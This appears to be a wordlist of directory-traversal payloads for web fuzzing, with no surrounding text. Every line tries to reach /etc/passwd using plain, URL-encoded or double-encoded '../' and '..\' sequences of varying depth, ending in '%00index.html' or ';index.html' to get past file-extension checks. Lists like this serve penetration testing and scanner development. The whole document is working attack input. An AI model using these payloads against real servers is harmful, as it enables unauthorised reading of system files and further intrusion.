%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd%00index.html
%252e%252e%255c/etc/passwd%00index.html
%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html
%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html
..//etc/passwd;index.html
../..//etc/passwd;index.html
../../..//etc/passwd;index.html
../../../..//etc/passwd;index.html
../../../../..//etc/passwd;index.html
../../../../../..//etc/passwd;index.html
../../../../../../..//etc/passwd;index.html
../../../../../../../..//etc/passwd;index.html
..%2f/etc/passwd;index.html
..%2f..%2f/etc/passwd;index.html
..%2f..%2f..%2f/etc/passwd;index.html
..%2f..%2f..%2f..%2f/etc/passwd;index.html
..%2f..%2f..%2f..%2f..%2f/etc/passwd;index.html
..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd;index.html
..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd;index.html
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd;index.html
%2e%2e//etc/passwd;index.html
%2e%2e/%2e%2e//etc/passwd;index.html
%2e%2e/%2e%2e/%2e%2e//etc/passwd;index.html
%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd;index.html
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd;index.html
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd;index.html
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd;index.html
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd;index.html
%2e%2e%2f/etc/passwd;index.html
%2e%2e%2f%2e%2e%2f/etc/passwd;index.html
%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd;index.html
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd;index.html
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd;index.html
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd;index.html
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd;index.html
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd;index.html
..%252f/etc/passwd;index.html
..%252f..%252f/etc/passwd;index.html
..%252f..%252f..%252f/etc/passwd;index.html
..%252f..%252f..%252f..%252f/etc/passwd;index.html
..%252f..%252f..%252f..%252f..%252f/etc/passwd;index.html
..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd;index.html
..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd;index.html
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd;index.html
%252e%252e//etc/passwd;index.html
%252e%252e/%252e%252e//etc/passwd;index.html
%252e%252e/%252e%252e/%252e%252e//etc/passwd;index.html
%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd;index.html
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd;index.html
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd;index.html
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd;index.html
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd;index.html
%252e%252e%252f/etc/passwd;index.html
%252e%252e%252f%252e%252e%252f/etc/passwd;index.html
%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd;index.html
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd;index.html
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd;index.html
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd;index.html
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd;index.html
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd;index.html
..\/etc/passwd;index.html
..\..\/etc/passwd;index.html
..\..\..\/etc/passwd;index.html
..\..\..\..\/etc/passwd;index.html
..\..\..\..\..\/etc/passwd;index.html
..\..\..\..\..\..\/etc/passwd;index.html
..\..\..\..\..\..\..\/etc/passwd;index.html
..\..\..\..\..\..\..\..\/etc/passwd;index.html
..%5c/etc/passwd;index.html
..%5c..%5c/etc/passwd;index.html
..%5c..%5c..%5c/etc/passwd;index.html
..%5c..%5c..%5c..%5c/etc/passwd;index.html
..%5c..%5c..%5c..%5c..%5c/etc/passwd;index.html
..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd;index.html
..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd;index.html
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd;index.html
%2e%2e\/etc/passwd;index.html
%2e%2e\%2e%2e\/etc/passwd;index.html
%2e%2e\%2e%2e\%2e%2e\/etc/passwd;index.html
%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd;index.html
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd;index.html
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd;index.html
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd;index.html
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd;index.html
%2e%2e%5c/etc/passwd;index.html
%2e%2e%5c%2e%2e%5c/etc/passwd;index.html
%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd;index.html
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd;index.html
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd;index.html
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd;index.html
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd;index.html
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd;index.html
..%255c/etc/passwd;index.html
..%255c..%255c/etc/passwd;index.html
..%255c..%255c..%255c/etc/passwd;index.html